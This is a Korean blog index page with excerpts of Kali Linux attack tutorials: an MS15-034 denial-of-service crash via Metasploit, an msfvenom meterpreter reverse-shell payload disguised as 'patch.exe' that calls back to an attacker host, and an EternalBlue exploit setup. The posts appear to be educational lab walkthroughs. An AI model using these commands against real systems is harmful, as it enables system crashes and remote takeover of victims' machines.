본문 바로가기

보안/LINUX

(11)
칼리 리눅스 (강제 종료 공격) Msfconsole 실행 Ms15-034검색 1번 auxiliary/dos/http/ms15_034_ulonglongadd 사용! Show options 입력 (정보 확인)! Set rhosts 1.0.0.100 (공격 대상 지정)과 set targeturi welcome.png (웰컴 페이지 설정) 실행시키는 순간 공격대상에서 블루스크린이 뜨고 강제 재부팅이 실행됨을 볼 수 있다. (공격대상 입장)
칼리 리눅스(방화벽 on) 실행파일 이용 공격 공격대상이 방화벽이 on일 경우에는 어떤 방법이 있을까? 설치파일을 공격대상에게 보내서 사용자가 설치파일을 실행하게 되면 공격대상이 공격이 가능하게 한다. msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -o /root/patch.exe의 명령어 실행! (홈 디렉토리에 포트 4444번을 쓰고 실행파일을 가진 patch.exe를 추가하겠다.) Msfconsole Use exploit/multi/handler (Payload(페이로드) 연결을 받고 Handle(다룰) 수 있는 Handler로 이동하여 줌) set payload windows/x64/meterprete..
칼리 리눅스(방화벽 off) 이터널블루 공격 이터널블루(EternalBlue, ETERNALBLUE[1])는 일반적으로 미국 국가안보국(NSA)에 의해 개발된 것으로 간주되는 취약점 공격 도구이다. 섀도 브로커스라는 해커 그룹이 2017년 4월 14일에 유출하였으며, 2017년 5월 12일에 전 세계 워너크라이 랜섬웨어 공격의 일부로 사용되었다 이터널블루 공격 (공격대상이 방화벽 off일떄) service postgresql start msfdb init(데이터베이스 초기화) msfconsole(콘솔창 진입) 이터널블루 검색하여 정보를 확인하였고 3번을 쓰겠다. Use exploit/windows/smb/ms17_010_eternalblue 여기서 reverse connection을 이용할 것이다. 이용하는 이유는 출처 : https://onyou..